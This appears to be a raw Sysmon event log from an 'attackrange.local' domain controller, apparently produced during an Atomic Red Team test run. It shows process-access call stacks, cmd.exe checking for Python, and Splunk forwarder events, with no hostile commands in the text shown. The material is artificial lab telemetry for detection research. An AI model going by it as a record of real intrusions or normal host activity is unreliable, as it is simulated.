21:10:05.014{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4006-00000000CF01}1920C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025184Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.014{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025183Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.014{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025182Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.014{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025181Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.014{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025180Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.014{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32D-60D3-4006-00000000CF01}1920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025179Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.014{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4006-00000000CF01}1920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025178Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.023{4DB9351A-A32D-60D3-4006-00000000CF01}1920C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "py -3 --version >nul 2>&1 && exit /b %%errorlevel%%" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000025177Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.998{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32D-60D3-3F06-00000000CF01}7016C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025176Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.998{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-3F06-00000000CF01}7016C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025175Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.998{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025174Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.998{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025173Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.998{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025172Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.998{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025171Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.998{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32D-60D3-3F06-00000000CF01}7016C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025170Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.998{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-3F06-00000000CF01}7016C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025169Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.006{4DB9351A-A32D-60D3-3F06-00000000CF01}7016C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "echo "Python 3 must be installed manually"" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025168Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.998{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025167Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.998{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025336Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.905{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-out.txtMD5=149051A423F9BF9BE55830BBDEC334E2,SHA256=00A849F83460016C81E181F0DD2177A73CCD4785107487A7B170DA033932F54A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000025335Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.178{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61533-false10.0.1.12-8000- 23542300x800000000000000025334Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.795{4DB9351A-A32E-60D3-4A06-00000000CF01}3244ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025333Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.780{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2FD58F01C63EA920D2FD1F5F473F397C,SHA256=5AE570E2ABB20B5BFB8D40022C8AC63AD52FA8F6D84D92AD913698DC6AE57231,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025332Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.686{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A32E-60D3-4A06-00000000CF01}3244C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025331Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.670{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A32E-60D3-4A06-00000000CF01}3244C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025330Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.608{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A32E-60D3-4A06-00000000CF01}3244C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025329Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 